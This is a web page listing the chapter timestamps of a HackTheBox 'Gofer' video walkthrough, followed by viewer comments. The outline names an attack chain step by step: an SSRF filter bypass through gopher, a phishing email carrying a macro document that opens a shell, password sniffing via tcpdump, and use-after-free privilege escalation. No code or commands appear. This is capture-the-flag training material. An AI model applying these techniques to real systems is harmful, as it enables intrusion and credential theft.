Friday, December 13, 2024
Latest:
DNS Server linuxLinux serverNETWORK ADMINISTRATIONS

HackTheBox – Gofer

00:00 – Introduction
01:00 – Start of nmap
03:40 – Running gobuster to discover the proxy.gofer.htb subdomain
05:20 – Enumerating SMB to find a note which gives an email address to send a malicious document to and hints at HTTP Methods being filtered
08:45 – Discovering the proxy.gofer.htb domain responds differently to POST vs GET requests, then gobustering setting our method to POST
11:55 – Finding a SSRF in the proxy, then playing with protocols to discover it accepts GOPHER requests
16:40 – Showing we can get around the localhost/127.0.0.1 blacklist by encoding the IP Address in HEX, then showing why gopher requests are cool
21:30 – Sending a SMTP Request via gopher to send an email with a link to a malicious file
27:55 – Making a ODT Document with a macro that executes on-open and sends a shell
34:50 – shell as jhudson
36:30 – Going over LinPEAS, discovering TCPDump has capabilities to allow any user to capture packets
44:40 – Opening the capture in Wireshark and showing the TBuckley sent his password to the proxy, then SSH as him
46:57 – Executing the notes binary, looks like a traditional UAF Problem, playing with it blindly
50:30 – Opening the binary in Ghidra to show deleting the username only calls free, does not unset the pointer
53:19 – Running the binary in GDB, then setting breakpoints and showing USER and NOTES have different pointers when setting them one after another.
56:00 – Showing what happens when you create the user, free the memory, then create the note (Both USER and NOTE now point to the same point in memory
59:38 – Having an issue when doing it, turns out to be because we placed our shell in /dev/shm which is mounted NOSUID

source

by IppSec

linux dns server

You May Also Like

Mac OS X Server Configure DHCP Options 66 and 67

Netflow for Zabbix with H5-Flow

Rackspace – "IS IT SAFE?" Taking Torture Out of OpenStack and Neutron

12 thoughts on “HackTheBox – Gofer

  • 4:51 I love ffuf for subdomain and vhost enumeration. Very versatile tool i picked up during my journey doing the CPTS material.

    Im currently 25% through Dante Pro lab and plan to take the exam in about 3 weeks. Excited and nervous.

  • hey ipp, what keyboard r u using if i may ask?

  • Great video! Thanks for taking the time to explain your thought process in detail, learned a lot.

  • On Debian there by default is no sudo installed.

  • This one was done very very well! Outstanding explanations !!

  • For lateral movement I completely skipped the capability on tcpdump and with pspy found a curl command on proxy.gofer.htb with tbuckley username and password in cleartext. I guess this was unintended?

  • why don't you make a course that would me great

  • Common IppSec phrases:

    What's going on, YouTube, this is IppSec, and we're doing X from Hack The Box

    As always we start with nmap so -sC for default scripts, -sV for enumerate version, -oA to output all formats

    This may take some time to run so I've already ran it

    Please subscribe

    Shoot

    I did not have Ipp relations with that woman

    There we go

    Hey, at least I'm not drinking, Brian

    Hope you guys enjoyed the video, take care, and I will see you all next time

Comments are closed.